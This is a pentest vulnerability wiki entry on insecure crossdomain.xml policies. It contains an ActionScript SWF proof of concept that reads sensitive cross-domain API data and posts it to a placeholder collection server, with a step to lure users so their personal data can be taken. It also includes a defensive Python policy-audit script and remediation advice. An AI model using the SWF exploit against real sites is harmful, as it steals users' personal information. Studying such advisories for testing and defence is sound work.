Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V4 - Access Control

Insecure crossdomain.xml policy

POC

  • Check the crossdomain.xml endpoint
  • Register one of the domains in the list
  • Adjust and compile the following SWF file

    package {
        import flash.display.Sprite;
        import flash.events.*;
        import flash.net.URLRequestMethod;
        import flash.net.URLRequest;
        import flash.net.URLLoader;

        public class poc extends Sprite {
            public function poc() {
                // Target URL from where the data is to be retrieved
                var readFrom:String = "anyclientAPIendpointreturningsensitivedata";
                var readRequest:URLRequest = new URLRequest(readFrom);
                var getLoader:URLLoader = new URLLoader();
                // eventHandler runs once the cross-domain response has been read
                getLoader.addEventListener(Event.COMPLETE, eventHandler);
                try {
                    getLoader.load(readRequest);
                } catch (error:Error) {
                    trace("Error loading URL: " + error);
                }
            }

            private function eventHandler(event:Event):void {
                // URL to which retrieved data is to be sent
                var sendTo:String = "addaloggingserverheretostorethedata";
                var sendRequest:URLRequest = new URLRequest(sendTo);
                sendRequest.method = URLRequestMethod.POST;
                var body:String = escape(event.target.data);
                sendRequest.data = body;
                var sendLoader:URLLoader = new URLLoader();
                try {
                    sendLoader.load(sendRequest);
                } catch (error:Error) {
                    trace("Error loading URL: " + error);
                }
            }
        }
    }

  • Embed it like this in an HTML file on the newly bought domain

  • Trick users into visiting your site and exfiltrate as much personally identifiable information as possible.
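The first step above is reviewing the crossdomain.xml file itself. The following audit script is an added example, not code from the Cobalt wiki, and it assumes two constructed sample policies embedded inline: one with the permissive settings that make the attack above possible (a "*" entry, a wildcard subdomain, secure="false", an open site-control) and one restricted to a single HTTPS origin. It flags the weak settings and returns the explicitly listed hostnames, which a reviewer should then confirm are still registered to and controlled by the application owner, since an unowned listed domain is exactly what step two relies on.

```python
import xml.etree.ElementTree as ET

# Constructed sample policy (not taken from the page): permissive settings.
INSECURE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*"/>
  <allow-access-from domain="*.example-partner.com" secure="false"/>
  <allow-access-from domain="old-marketing-site.example"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
"""

# Constructed sample policy: one explicit HTTPS-only origin, master policy only.
SECURE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="app.example.com" secure="true"/>
</cross-domain-policy>
"""


def audit_crossdomain(xml_text):
    """Return a list of (severity, finding) tuples for a crossdomain.xml document."""
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [("high", "root element is not <cross-domain-policy>")]

    # site-control="all" lets any path on the host serve additional policies,
    # so a file upload anywhere on the site could widen access.
    site_control = root.find("site-control")
    if site_control is not None and \
            site_control.get("permitted-cross-domain-policies", "") == "all":
        findings.append(("medium",
                         "site-control permits policy files anywhere on the host ('all')"))

    for entry in root.findall("allow-access-from"):
        domain = entry.get("domain", "")
        # Per the policy format, 'secure' defaults to true when omitted.
        secure = entry.get("secure", "true").lower()
        if domain == "*":
            findings.append(("high",
                             "allow-access-from domain='*' lets any origin read authenticated responses"))
        elif domain.startswith("*."):
            findings.append(("medium",
                             f"wildcard entry '{domain}' trusts every host under it, including stale ones"))
        if secure == "false":
            findings.append(("medium",
                             f"entry '{domain}' sets secure='false': SWFs served over HTTP may read HTTPS content"))

    for entry in root.findall("allow-http-request-headers-from"):
        if entry.get("domain") == "*" and entry.get("headers", "") == "*":
            findings.append(("medium",
                             "allow-http-request-headers-from domain='*' headers='*' allows arbitrary headers from any origin"))
    return findings


def listed_domains(xml_text):
    """Explicit (non-wildcard) hostnames in the policy, for ownership verification."""
    root = ET.fromstring(xml_text)
    return [e.get("domain") for e in root.findall("allow-access-from")
            if e.get("domain") and "*" not in e.get("domain")]


if __name__ == "__main__":
    for name, policy in (("insecure", INSECURE_POLICY), ("secure", SECURE_POLICY)):
        print(f"== {name} policy ==")
        for severity, text in audit_crossdomain(policy) or [("info", "no weak settings found")]:
            print(f"[{severity}] {text}")
        print("verify ownership of:", listed_domains(policy))
```

The remediation the secure sample illustrates is to list only the exact origins that need Flash cross-domain access, keep secure="true", and set site-control to master-only so no other policy file on the host can relax it. A finding list that is empty is only half the review: every hostname returned by listed_domains still needs a manual registration and ownership check.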

Impact

High

Likelihood

High